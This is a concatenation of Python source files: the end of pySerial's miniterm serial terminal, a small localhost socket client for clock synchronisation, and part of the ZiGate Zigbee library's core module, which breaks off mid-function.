self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character {} --\n'.format(key_description(c)))
def get_help_text(self):
"""return the help text"""
# help text, starts with blank line!
return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
exit=key_description(self.exit_character),
menu=key_description(self.menu_character),
rts=key_description('\x12'),
dtr=key_description('\x04'),
brk=key_description('\x02'),
echo=key_description('\x05'),
info=key_description('\x09'),
upload=key_description('\x15'),
repr=key_description('\x01'),
filter=key_description('\x06'),
eol=key_description('\x0c'))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from an other script
# e.g to create a miniterm-my-device.py
def main(default_port=None, default_baudrate=9600, default_rts=None, default_dtr=None):
"""Command line tool, entry point"""
import argparse
parser = argparse.ArgumentParser(
description="Miniterm - A simple terminal program for the serial port.")
parser.add_argument(
"port",
nargs='?',
help="serial port name ('-' to show port list)",
default=default_port)
parser.add_argument(
"baudrate",
nargs='?',
type=int,
help="set baud rate, default: %(default)s",
default=default_baudrate)
group = parser.add_argument_group("port settings")
group.add_argument(
"--parity",
choices=['N', 'E', 'O', 'S', 'M'],
type=lambda c: c.upper(),
help="set parity, one of {N E O S M}, default: N",
default='N')
group.add_argument(
"--rtscts",
action="store_true",
help="enable RTS/CTS flow control (default off)",
default=False)
group.add_argument(
"--xonxoff",
action="store_true",
help="enable software flow control (default off)",
default=False)
group.add_argument(
"--rts",
type=int,
help="set initial RTS line state (possible values: 0, 1)",
default=default_rts)
group.add_argument(
"--dtr",
type=int,
help="set initial DTR line state (possible values: 0, 1)",
default=default_dtr)
group.add_argument(
"--ask",
action="store_true",
help="ask again for port when open fails",
default=False)
group = parser.add_argument_group("data handling")
group.add_argument(
"-e", "--echo",
action="store_true",
help="enable local echo (default off)",
default=False)
group.add_argument(
"--encoding",
dest="serial_port_encoding",
metavar="CODEC",
help="set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s",
default='UTF-8')
group.add_argument(
"-f", "--filter",
action="append",
metavar="NAME",
help="add text transformation",
default=[])
group.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="end of line mode",
default='CRLF')
group.add_argument(
"--raw",
action="store_true",
help="Do no apply any encodings/transformations",
default=False)
group = parser.add_argument_group("hotkeys")
group.add_argument(
"--exit-char",
type=int,
metavar='NUM',
help="Unicode of special character that is used to exit the application, default: %(default)s",
default=0x1d) # GS/CTRL+]
group.add_argument(
"--menu-char",
type=int,
metavar='NUM',
help="Unicode code of special character that is used to control miniterm (menu), default: %(default)s",
default=0x14) # Menu: CTRL+T
group = parser.add_argument_group("diagnostics")
group.add_argument(
"-q", "--quiet",
action="store_true",
help="suppress non-error messages",
default=False)
group.add_argument(
"--develop",
action="store_true",
help="show Python traceback on error",
default=False)
args = parser.parse_args()
if args.menu_char == args.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
if args.filter:
if 'help' in args.filter:
sys.stderr.write('Available filters:\n')
sys.stderr.write('\n'.join(
'{:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n')
sys.exit(1)
filters = args.filter
else:
filters = ['default']
while True:
# no port given on command line -> ask user now
if args.port is None or args.port == '-':
try:
args.port = ask_for_port()
except KeyboardInterrupt:
sys.stderr.write('\n')
parser.error('user aborted and port is not given')
else:
if not args.port:
parser.error('port is not given')
try:
serial_instance = serial.serial_for_url(
args.port,
args.baudrate,
parity=args.parity,
rtscts=args.rtscts,
xonxoff=args.xonxoff,
do_not_open=True)
if not hasattr(serial_instance, 'cancel_read'):
# enable timeout for alive flag polling if cancel_read is not available
serial_instance.timeout = 1
if args.dtr is not None:
if not args.quiet:
sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
serial_instance.dtr = args.dtr
if args.rts is not None:
if not args.quiet:
sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
serial_instance.rts = args.rts
serial_instance.open()
except serial.SerialException as e:
sys.stderr.write('could not open port {}: {}\n'.format(repr(args.port), e))
if args.develop:
raise
if not args.ask:
sys.exit(1)
else:
args.port = '-'
else:
break
miniterm = Miniterm(
serial_instance,
echo=args.echo,
eol=args.eol.lower(),
filters=filters)
miniterm.exit_character = unichr(args.exit_char)
miniterm.menu_character = unichr(args.menu_char)
miniterm.raw = args.raw
miniterm.set_rx_encoding(args.serial_port_encoding)
miniterm.set_tx_encoding(args.serial_port_encoding)
if not args.quiet:
sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
p=miniterm.serial))
sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
key_description(miniterm.exit_character),
key_description(miniterm.menu_character),
key_description(miniterm.menu_character),
key_description('\x08')))
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not args.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
miniterm.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
|
client2.py
|
import socket
import datetime
import threading
import pytz
import time
from lib.MyUtils import TimeBuilder, ClientIncrementBuilder, get_time_server_delay
def set_time_from_server(raw_timestamp):
datetime_updated = TimeBuilder(
datetime.datetime.fromtimestamp(raw_timestamp))
if datetime_updated.get_time() < datetime_actual.get_time():
offset = datetime_actual.get_time() - datetime_updated.get_time()
print(offset * 2)
client_increment.set_values(True, 2, offset * 2, datetime.timedelta())
elif datetime_updated.get_time() > datetime_actual.get_time():
datetime_actual.time = datetime_updated.get_time()
print("[Server]: Updated time.")
def timer():
while True:
if client_increment.client_so_fast:
print("Client so fast")
if client_increment.added_offset < client_increment.client_increment_time:
client_increment.add_offsed_added(datetime.timedelta(seconds=1))
datetime_actual.add(datetime.timedelta(seconds=1))
time.sleep(client_increment.client_increment)
else:
client_increment.set_values(False, 1, 0, datetime.timedelta())
else:
datetime_actual.add(datetime.timedelta(seconds=1))
time.sleep(client_increment.client_increment)
def listen_handler(conn, address):
raw_data = conn.recv(1024)
print("New message from ", address, " : ", raw_data)
set_time_from_server(float(raw_data.decode()))
def my_listener(socket_instance):
print("Started client listener")
group_data = socket_instance.getsockname()
listener_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener_socket.bind((group_data[0], group_data[1]))
listener_socket.listen(10)
while True:
conn, address = listener_socket.accept()
temp_thread = threading.Thread(target=listen_handler, args=(conn, address,))
temp_thread.start()
if __name__ == "__main__":
# Client upper for 5 minutes
print("Client upper for 5 minutes running..")
datetime_actual = None
datetime_updated = None
socket_instance = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket_instance.connect(("localhost", 9999))
print(socket_instance.getsockname())
listen_thread = threading.Thread(target=my_listener, args=(socket_instance,))
listen_thread.start()
datetime_actual = TimeBuilder(datetime.datetime.now() - datetime.timedelta(minutes=5))
socket_instance.send(("my_time|" + str(datetime_actual.get_timestamp())).encode())
result = socket_instance.recv(1024)
print(result)
client_increment = ClientIncrementBuilder()
socket_instance.close()
|
core.py
|
#! /usr/bin/python3
#
# Copyright (c) 2018 Sébastien RAMAGE
#
# For the full copyright and license information, please view the LICENSE
# file that was distributed with this source code.
#
from binascii import hexlify
import traceback
from time import (sleep, strftime, time)
import logging
import json
import os
from shutil import copyfile
from pydispatch import dispatcher
from .transport import (ThreadSerialConnection,
ThreadSocketConnection,
FakeTransport)
from .responses import (RESPONSES, Response)
from .const import (ACTIONS_COLOR, ACTIONS_LEVEL, ACTIONS_LOCK, ACTIONS_HUE,
ACTIONS_ONOFF, ACTIONS_TEMPERATURE, ACTIONS_COVER,
ACTIONS_THERMOSTAT,
OFF, ON, TYPE_COORDINATOR, STATUS_CODES,
ZIGATE_ATTRIBUTE_ADDED, ZIGATE_ATTRIBUTE_UPDATED,
ZIGATE_DEVICE_ADDED, ZIGATE_DEVICE_REMOVED,
ZIGATE_DEVICE_UPDATED, ZIGATE_DEVICE_ADDRESS_CHANGED,
ZIGATE_PACKET_RECEIVED, ZIGATE_DEVICE_NEED_DISCOVERY,
ZIGATE_RESPONSE_RECEIVED, DATA_TYPE, BASE_PATH)
from .clusters import (Cluster, get_cluster)
import functools
import struct
import threading
import random
from enum import Enum
import colorsys
import datetime
try:
import RPi.GPIO as GPIO
except Exception:
# Fake GPIO
class GPIO:
def fake(self, *args, **kwargs):
LOGGER.error('GPIO Not available')
def __getattr__(self, *args, **kwargs):
return self.fake
GPIO = GPIO()
LOGGER = logging.getLogger('zigate')
AUTO_SAVE = 5 * 60 # 5 minutes
BIND_REPORT = True # automatically bind and report state for light
SLEEP_INTERVAL = 0.1
ACTIONS = {}
WAIT_TIMEOUT = 3
# Device id
ACTUATORS = [0x0010, 0x0051,
0x010a, 0x010b, 0x010c, 0x010d,
0x0100, 0x0101, 0x0102, 0x0103, 0x0105, 0x0110,
0x0200, 0x0202, 0x0210, 0x0220,
0x0301]
# On/off light 0x0000
# On/off plug-in unit 0x0010
# Dimmable light 0x0100
# Dimmable plug-in unit 0x0110
# Color light 0x0200
# Extended color light 0x0210
# Color temperature light 0x0220
# On/Off Light 0x0100 Section 3.1
# Dimmable Light 0x0101 Section 3.2
# Colour Dimmable Light 0x0102 Section 3.3
# On/Off Light Switch 0x0103 Section 3.4
# Dimmer Switch 0x0104 Section 3.5
# Colour Dimmer Switch 0x0105 Section 3.6
# Light Sensor 0x0106 Section 3.7
# Occupancy Sensor 0x0107 Section 3.8
# On/Off Ballast 0x0108 Section 3.9
# Dimmable Ballast 0x0109 Section 3.10
# On/Off Plug-in Unit 0x010A Section 3.11
# Dimmable Plug-in Unit 0x010B Section 3.12
# Colour Temperature Light 0x010C Section 3.13
# Extended Colour Light 0x010D Section 3.14
# Light Level Sensor 0x010E Section 3.15
# Colour Controller 0x0800 Section 3.16
# Colour Scene Controller 0x0810 Section 3.17
# Non-Colour Controller 0x0820 Section 3.18
# Non-Colour Scene Controller 0x0830 Section 3.19
# Control Bridge 0x0840 Section 3.20
# On/Off Sensor 0x0850 Section 3.21
def register_actions(action):
def decorator(func):
if action not in ACTIONS:
ACTIONS[action] = []
ACTIONS[action].append(func.__name__)
return func
return decorator
class AddrMode(Enum):
bound = 0
group = 1
short = 2
ieee = 3
def hex_to_rgb(h):
''' convert hex color to rgb tuple '''
h = h.strip('#')
return tuple(int(h[i:i + 2], 16) / 255 for i in (0, 2, 4))
def rgb_to_xy(rgb):
''' convert rgb tuple to xy tuple '''
red, green, blue = rgb
r = ((red + 0.055) / (1.0 + 0.055))**2.4 if (red > 0.04045) else (red / 12.92)
g = ((green + 0.055) / (1.0 + 0.055))**2.4 if (green > 0.04045) else (green / 12.92)
b = ((blue + 0.055) / (1.0 + 0.055))**2.4 if (blue > 0.04045) else (blue / 12.92)
X = r * 0.664511 + g * 0.154324 + b * 0.162028
Y = r * 0.283881 + g * 0.668433 + b * 0.047685
Z = r * 0.000088 + g * 0.072310 + b * 0.986039
cx = 0
cy = 0
if (X + Y + Z) != 0:
cx = X / (X + Y + Z)
cy = Y / (X + Y + Z)
return (cx, cy)
def hex_to_xy(h):
''' convert hex color to xy tuple '''
return rgb_to_xy(hex_to_rgb(h))
def dispatch_signal(signal=dispatcher.Any, sender=dispatcher.Anonymous,
*arguments, **named):
'''
Dispatch signal with exception proof
'''
LOGGER.debug('Dispatch %s', signal)
try:
dispatcher.send(signal, sender, *arguments, **named)
except Exception:
LOGGER.error('Exception dispatching signal %s', signal)
LOGGER.error(traceback.format_exc())
class ZiGate(object):
def __init__(self, port='auto', path='~/.zigate.json',
auto_start=True,
auto_save=True,
channel=None,
adminpanel=False):
self._devices = {}
self._groups = {}
self._scenes = {}
self._neighbours_table_cache = []
self._path = path
self._version = None
self._port = port
self._last_response = {} # response to last command type
self._last_status = {} # status to last command type
self._save_lock = threading.Lock()
self._autosavetimer = None
self._closing = False
self.connection = None
self._addr = '0000'
self._ieee = None
self.panid = 0
self.extended_panid = 0
self.channel = 0
self._started = False
self._no_response_count = 0
# self._event_thread = threading.Thread(target=self._event_loop,
# name='ZiGate-Event Loop')
# self._event_thread.setDaemon(True)
# self._event_thread.start()
self._ota_reset_local_variables()
if adminpanel:
self.start_adminpanel()
if auto_start:
self.startup(channel)
if auto_save:
self.start_auto_save()
@property
def ieee(self):
return self._ieee
@property
def addr(self):
return self._addr
def start_adminpanel(self):
'''
Start Admin panel in other thread
'''
from .adminpanel import start_adminpanel
start_adminpanel(self)
def _event_loop(self):
while not self._closing:
if self.connection and not self.connection.received.empty():
packet = self.connection.received.get()
dispatch_signal(ZIGATE_PACKET_RECEIVED, self, packet=packet)
t = threading.Thread(target=self.decode_data, args=(packet,),
name='ZiGate-Decode data')
t.setDaemon(True)
t.start()
# self.decode_data(packet)
else:
sleep(SLEEP_INTERVAL)
def setup_connection(self):
self.connection = ThreadSerialConnection(self, self._port)
def close(self):
self._closing = True
if self._autosavetimer:
self._autosavetimer.cancel()
try:
if self.connection:
self.connection.close()
except Exception:
LOGGER.error('Exception during closing')
LOGGER.error(traceback.format_exc())
self.connection = None
self._started = False
def save_state(self, path=None):
LOGGER.debug('Saving persistent file')
path = path or self._path
if path is None:
LOGGER.warning('Persistent file is disabled')
if self._autosavetimer:
self._autosavetimer.cancel()
return
self._path = os.path.expanduser(path)
backup_path = self._path + '.0'
LOGGER.debug('Acquire Lock to save persistent file')
r = self._save_lock.acquire(True, 5)
if not r:
LOGGER.error('Failed to acquire Lock to save persistent file')
return
try:
if os.path.exists(self._path):
LOGGER.debug('File already existing, make a backup before')
copyfile(self._path, backup_path)
except Exception:
LOGGER.error('Failed to create backup, cancel saving.')
LOGGER.error(traceback.format_exc())
LOGGER.debug('Release Lock of persistent file')
self._save_lock.release()
return
try:
data = {'devices': list(self._devices.values()),
'groups': self._groups,
'scenes': self._scenes,
'neighbours_table': self._neighbours_table_cache
}
with open(self._path, 'w') as fp:
json.dump(data, fp, cls=DeviceEncoder,
sort_keys=True, indent=4, separators=(',', ': '))
except Exception:
LOGGER.error('Failed to save persistent file %s', self._path)
LOGGER.error(traceback.format_exc())
LOGGER.error('Restoring backup...')
copyfile(backup_path, self._path)
LOGGER.debug('Release Lock of persistent file')
self._save_lock.release()
def load_state(self, path=None):
LOGGER.debug('Try loading persistent file')
path = path or self._path
if path is None:
LOGGER.warning('Persistent file is disabled')
return
self._path = os.path.expanduser(path)
backup_path = self._path + '.0'
files = [self._path, backup_path]
for f in files:
LOGGER.debug('Trying to load %s', f)
if not os.path.exists(f):
LOGGER.warning('Persistent file %s doesn\'t exist', f)
continue
try:
with open(f) as fp:
data = json.load(fp)
if not isinstance(data, dict): # old version
data = {'devices': data, 'groups': {}}
groups = data.get('groups', {})
for k, v in groups.items():
groups[k] = set([tuple(r) for r in v])
self._groups = groups
self._scenes = data.get('scenes', {})
self._neighbours_table_cache = data.get('neighbours_table', [])
devices = data.get('devices', [])
for data in devices:
try:
device = Device.from_json(data, self)
self._devices[device.addr] = device
device._create_actions()
except Exception:
LOGGER.error('Error loading device %s', data)
LOGGER.debug('Load success')
return True
except Exception:
LOGGER.error('Failed to load persistent file %s', self._path)
LOGGER.error(traceback.format_exc())
LOGGER.debug('No file to load')
return False
def start_auto_save(self):
LOGGER.debug('Auto saving %s', self._path)
self.save_state()
self._autosavetimer = threading.Timer(AUTO_SAVE, self.start_auto_save)
self._autosavetimer.setDaemon(True)
self._autosavetimer.start()
def __del__(self):
self.close()
def _start_event_thread(self):
self._event_thread = threading.Thread(target=self._event_loop,
name='ZiGate-Event Loop')
self._event_thread.setDaemon(True)
self._event_thread.start()
def autoStart(self, channel=None):
self.startup(channel)
def startup(self, channel=None):
'''
Startup sequence:
- Load persistent file
- setup connection
- Set Channel mask
- Set Type Coordinator
- Start Network
- Refresh devices list
'''
if self._started:
return
self._closing = False
self._start_event_thread()
self.load_state()
self.setup_connection()
version = self.get_version()
self.set_channel(channel)
self.set_type(TYPE_COORDINATOR)
LOGGER.debug('Check network state')
# self.start_network()
network_state = self.get_network_state()
if not network_state:
LOGGER.error('Failed to get network state')
if not network_state or network_state.get('extended_panid') == 0 or \
network_state.get('addr') == 'ffff':
LOGGER.debug('Network is down, start it')
self.start_network(True)
if version and version['version'] >= '3.1a':
LOGGER.debug('Set Zigate normal mode (firmware >= 3.1a)')
self.set_raw_mode(False)
if version and version['version'] >= '3.0f':
LOGGER.debug('Set Zigate Time (firmware >= 3.0f)')
self.set_time()
self.get_devices_list(True)
t = threading.Thread(target=self.need_discovery)
t.setDaemon(True)
t.start()
# self.need_discovery()
def need_discovery(self):
'''
scan device which need discovery
auto discovery if possible
else dispatch signal
'''
for device in self.devices:
if device.need_discovery():
if device.receiver_on_when_idle():
LOGGER.debug('Auto discover device %s', device)
device.discover_device()
else:
dispatch_signal(ZIGATE_DEVICE_NEED_DISCOVERY,
self, **{'zigate': self,
'device': device})
def zigate_encode(self, data):
encoded = bytearray()
for b in data:
if b < 0x10:
encoded.extend([0x02, 0x10 ^ b])
else:
encoded.append(b)
return encoded
def zigate_decode(self, data):
flip = False
decoded = bytearray()
for b in data:
if flip:
flip = False
decoded.append(b ^ 0x10)
elif b == 0x02:
flip = True
else:
decoded.append(b)
return decoded
def checksum(self, *args):
chcksum = 0
for arg in args:
if isinstance(arg, int):
chcksum ^= arg
continue
for x in arg:
chcksum ^= x
return chcksum
def send_to_transport(self, data):
if not self.connection.is_connected():
raise Exception('Not connected to zigate')
self.connection.send(data)
def send_data(self, cmd, data="", wait_response=None, wait_status=True):
'''
send data through ZiGate
'''
LOGGER.debug('REQUEST : 0x{:04x} {}'.format(cmd, data))
self._last_status[cmd] = None
if wait_response:
self._clear_response(wait_response)
if isinstance(cmd, int):
byte_cmd = struct.pack('!H', cmd)
elif isinstance(data, str):
byte_cmd = bytes.fromhex(cmd)
else:
byte_cmd = cmd
if isinstance(data, str):
byte_data = bytes.fromhex(data)
else:
byte_data = data
assert type(byte_cmd) == bytes
assert type(byte_data) == bytes
length = len(byte_data)
byte_length = struct.pack('!H', length)
checksum = self.checksum(byte_cmd, byte_length, byte_data)
msg = struct.pack('!HHB%ds' % length, cmd, length, checksum, byte_data)
LOGGER.debug('Msg to send %s', hexlify(msg))
enc_msg = self.zigate_encode(msg)
enc_msg.insert(0, 0x01)
enc_msg.append(0x03)
encoded_output = bytes(enc_msg)
LOGGER.debug('Encoded Msg to send %s', hexlify(encoded_output))
self.send_to_transport(encoded_output)
if wait_status:
status = self._wait_status(cmd)
if wait_response and status is not None:
r = self._wait_response(wait_response)
return r
return status
return False
def decode_data(self, packet):
'''
Decode raw packet message
'''
try:
decoded = self.zigate_decode(packet[1:-1])
msg_type, length, checksum, value, lqi = \
struct.unpack('!HHB%dsB' % (len(decoded) - 6), decoded)
except Exception:
LOGGER.error('Failed to decode packet : %s', hexlify(packet))
return
if length != len(value) + 1: # add lqi length
LOGGER.error('Bad length %s != %s : %s', length, len(value) + 1, value)
return
computed_checksum = self.checksum(decoded[:4], lqi, value)
if checksum != computed_checksum:
LOGGER.error('Bad checksum %s != %s', checksum, computed_checksum)
return
LOGGER.debug('Received response 0x{:04x}: {}'.format(msg_type, hexlify(value)))
try:
response = RESPONSES.get(msg_type, Response)(value, lqi)
except Exception:
LOGGER.error('Error decoding response 0x{:04x}: {}'.format(msg_type, hexlify(value)))
LOGGER.error(traceback.format_exc())
return
if msg_type != response.msg:
LOGGER.warning('Unknown response 0x{:04x}'.format(msg_type))
LOGGER.debug(response)
self._last_response[msg_type] = response
self.interpret_response(response)
dispatch_signal(ZIGATE_RESPONSE_RECEIVED, self, response=response)
def interpret_response(self, response):
if response.msg == 0x8000: # status
if response['status'] != 0:
LOGGER.error('Command 0x{:04x} failed {} : {}'.format(response['packet_type'],
response.status_text(),
response['error']))
self._last_status[response['packet_type']] = response
elif response.msg == 0x8007: # factory reset
if response['status'] == 0:
self._devices = {}
self.start_network()
elif response.msg == 0x8015: # device list
keys = set(self._devices.keys())
known_addr = set([d['addr'] for d in response['devices']])
LOGGER.debug('Known devices in zigate : %s', known_addr)
missing = keys.difference(known_addr)
LOGGER.debug('Previous devices missing : %s', missing)
for addr in missing:
self._tag_missing(addr)
# self._remove_device(addr)
for d in response['devices']:
if d['ieee'] == '0000000000000000':
continue
device = Device(dict(d), self)
self._set_device(device)
elif response.msg == 0x8042: # node descriptor
addr = response['addr']
d = self.get_device_from_addr(addr)
if d:
d.update_info(response.cleaned_data())
self.discover_device(addr)
elif response.msg == 0x8043: # simple descriptor
addr = response['addr']
endpoint = response['endpoint']
d = self.get_device_from_addr(addr)
if d:
ep = d.get_endpoint(endpoint)
ep.update(response.cleaned_data())
ep['in_clusters'] = response['in_clusters']
ep['out_clusters'] = response['out_clusters']
self.discover_device(addr)
d._create_actions()
elif response.msg == 0x8045: # endpoint list
addr = response['addr']
d = self.get_device_from_addr(addr)
if d:
for endpoint in response['endpoints']:
ep = d.get_endpoint(endpoint['endpoint'])
self.simple_descriptor_request(addr, endpoint['endpoint'])
self.discover_device(addr)
elif response.msg == 0x8048: # leave
device = self.get_device_from_ieee(response['ieee'])
if device:
if response['rejoin_status'] == 1:
device.missing = True
else:
self._remove_device(device.addr)
elif response.msg == 0x8062: # Get group membership response
data = response.cleaned_data()
self._sync_group_membership(data['addr'], data['endpoint'], data['groups'])
elif response.msg in (0x8100, 0x8102, 0x8110, 0x8401,
0x8085, 0x8095, 0x80A7): # attribute report or IAS Zone status change
if response.get('status', 0) != 0:
LOGGER.debug('Received Bad status')
# handle special case, no model identifier
if response['status'] == 0x86 and response['cluster'] == 0 and response['attribute'] == 5:
response['data'] = 'unsupported'
else:
return
# ignore if related to zigate
if response['addr'] == self.addr:
return
device = self._get_device(response['addr'])
device.lqi = response['lqi']
r = device.set_attribute(response['endpoint'],
response['cluster'],
response.cleaned_data())
if r is None:
return
added, attribute_id = r
changed = device.get_attribute(response['endpoint'],
response['cluster'],
attribute_id, True)
if response['cluster'] == 0 and attribute_id == 5:
if not device.discovery:
device.load_template()
if added:
dispatch_signal(ZIGATE_ATTRIBUTE_ADDED, self, **{'zigate': self,
'device': device,
'attribute': changed})
else:
dispatch_signal(ZIGATE_ATTRIBUTE_UPDATED, self, **{'zigate': self,
'device': device,
'attribute': changed})
elif response.msg == 0x004D: # device announce
LOGGER.debug('Device Announce %s', response)
device = Device(response.data, self)
self._set_device(device)
elif response.msg == 0x8140: # attribute discovery
if 'addr' in response:
# ignore if related to zigate
if response['addr'] == self.addr:
return
device = self._get_device(response['addr'])
r = device.set_attribute(response['endpoint'],
response['cluster'],
response.cleaned_data())
elif response.msg == 0x8501: # OTA image block request
LOGGER.debug('Client is requesting ota image data')
self._ota_send_image_data(response)
elif response.msg == 0x8503: # OTA Upgrade end request
LOGGER.debug('Client ended ota process')
self._ota_handle_upgrade_end_request(response)
elif response.msg == 0x8702: # APS Data confirm Fail
LOGGER.error(response)
# else:
# LOGGER.debug('Do nothing special for response {}'.format(response))
def _get_device(self, addr):
'''
get device from addr
create it if necessary
'''
d = self.get_device_from_addr(addr)
if not d:
LOGGER.warning('Device not found, create it (this isn\'t normal)')
d = Device({'addr': addr}, self)
self._set_device(d)
self.get_devices_list() # since device is missing, request info
return d
def _tag_missing(self, addr):
'''
tag a device as missing
'''
last_24h = datetime.datetime.now() - datetime.timedelta(hours=24)
last_24h = last_24h.strftime('%Y-%m-%d %H:%M:%S')
if addr in self._devices:
if self._devices[addr].last_seen and self._devices[addr].last_seen < last_24h:
self._devices[addr].missing = True
LOGGER.warning('The device %s is missing', addr)
dispatch_signal(ZIGATE_DEVICE_UPDATED,
self, **{'zigate': self,
'device': self._devices[addr]})
def get_missing(self):
'''
return missing devices
'''
return [device for device in self._devices.values() if device.missing]
def cleanup_devices(self):
'''
remove devices tagged missing
'''
to_remove = [device.addr for device in self.get_missing()]
for addr in to_remove:
self._remove_device(addr)
def _remove_device(self, addr):
'''
remove device from addr
'''
device = self._devices.pop(addr)
dispatch_signal(ZIGATE_DEVICE_REMOVED, **{'zigate': self,
'addr': addr,
'device': device})
def _set_device(self, device):
'''
add/update device to cache list
'''
assert type(device) == Device
if device.addr in self._devices:
self._devices[device.addr].update(device)
dispatch_signal(ZIGATE_DEVICE_UPDATED, self, **{'zigate': self,
'device': self._devices[device.addr]})
else:
# check if device already exist with other address
d = self.get_device_from_ieee(device.ieee)
if d:
LOGGER.warning('Device already exists with another addr %s, rename it.', d.addr)
old_addr = d.addr
new_addr = device.addr
d.discovery = ''
d.update(device)
self._devices[new_addr] = d
del self._devices[old_addr]
dispatch_signal(ZIGATE_DEVICE_ADDRESS_CHANGED, self,
**{'zigate': self,
'device': d,
'old_addr': old_addr,
'new_addr': new_addr,
})
else:
self._devices[device.addr] = device
dispatch_signal(ZIGATE_DEVICE_ADDED, self, **{'zigate': self,
'device': device})
self.discover_device(device.addr)
def get_status_text(self, status_code):
return STATUS_CODES.get(status_code,
'Failed with event code: %s', status_code)
def _clear_response(self, msg_type):
if msg_type in self._last_response:
del self._last_response[msg_type]
def _wait_response(self, msg_type):
'''
wait for next msg_type response
'''
LOGGER.debug('Waiting for message 0x{:04x}'.format(msg_type))
t1 = time()
while self._last_response.get(msg_type) is None:
sleep(0.01)
t2 = time()
if t2 - t1 > WAIT_TIMEOUT: # no response timeout
LOGGER.warning('No response waiting command 0x{:04x}'.format(msg_type))
return
LOGGER.debug('Stop waiting, got message 0x{:04x}'.format(msg_type))
return self._last_response.get(msg_type)
def _wait_status(self, cmd):
'''
wait for status of cmd
'''
LOGGER.debug('Waiting for status message for command 0x{:04x}'.format(cmd))
t1 = time()
while self._last_status.get(cmd) is None:
sleep(0.01)
t2 = time()
if t2 - t1 > WAIT_TIMEOUT: # no response timeout
self._no_response_count += 1
LOGGER.warning('No response after command 0x{:04x} ({})'.format(cmd, self._no_response_count))
return
self._no_response_count = 0
LOGGER.debug('STATUS code to command 0x{:04x}:{}'.format(cmd, self._last_status.get(cmd)))
return self._last_status.get(cmd)
def __addr(self, addr):
''' convert hex string addr to int '''
if isinstance(addr, str):
addr = int(addr, 16)
return addr
def __haddr(self, int_addr, length=4):
''' convert int addr to hex '''
return '{0:0{1}x}'.format(int_addr, length)
@property
def devices(self):
return list(self._devices.values())
def get_device_from_addr(self, addr):
return self._devices.get(addr)
def get_device_from_ieee(self, ieee):
if ieee:
for d in self._devices.values():
if d.ieee == ieee:
return d
def get_devices_list(self, wait=False):
'''
refresh device list from zigate
'''
wait_response = None
if wait:
wait_response = 0x8015
self.send_data(0x0015, wait_response=wait_response)
def set_raw_mode(self, enable=True):
'''
Set Blue Led state ON/OFF
'''
data = struct.pack('!B', enable)
return self.send_data(0x0002, data)
def get_version(self, refresh=False):
'''
get zigate firmware version
'''
if not self._version or refresh:
r = self.send_data(0x0010, wait_response=0x8010)
if r:
self._version = r.data
else:
LOGGER.warning('Failed to retrieve zigate firmware version')
return self._version
def get_version_text(self, refresh=False):
'''
get zigate firmware version as text
'''
v = self.get_version(refresh)['version']
return v
def reset(self):
'''
reset zigate
'''
return self.send_data(0x0011, wait_status=False)
def erase_persistent(self):
'''
erase persistent data in zigate
'''
return self.send_data(0x0012, wait_status=False)
def factory_reset(self):
'''
ZLO/ZLL "Factory New" Reset
'''
return self.send_data(0x0013, wait_status=False)
def is_permitting_join(self):
'''
check if zigate is permitting join
'''
r = self.send_data(0x0014, wait_response=0x8014)
if r:
r = r.get('status', False)
return r
def set_time(self, dt=None):
'''
Set internal zigate time
dt should be datetime.datetime object
'''
dt = dt or datetime.datetime.now()
# timestamp from 2000-01-01 00:00:00
timestamp = int((dt - datetime.datetime(2000, 1, 1)).total_seconds())
data = struct.pack('!L', timestamp)
self.send_data(0x0016, data)
def get_time(self):
'''
get internal zigate time
'''
r = self.send_data(0x0017, wait_response=0x8017)
dt = None
if r:
timestamp = r.get('timestamp')
dt = datetime.datetime(2000, 1, 1) + datetime.timedelta(seconds=timestamp)
return dt
def set_led(self, on=True):
'''
Set Blue Led state ON/OFF
'''
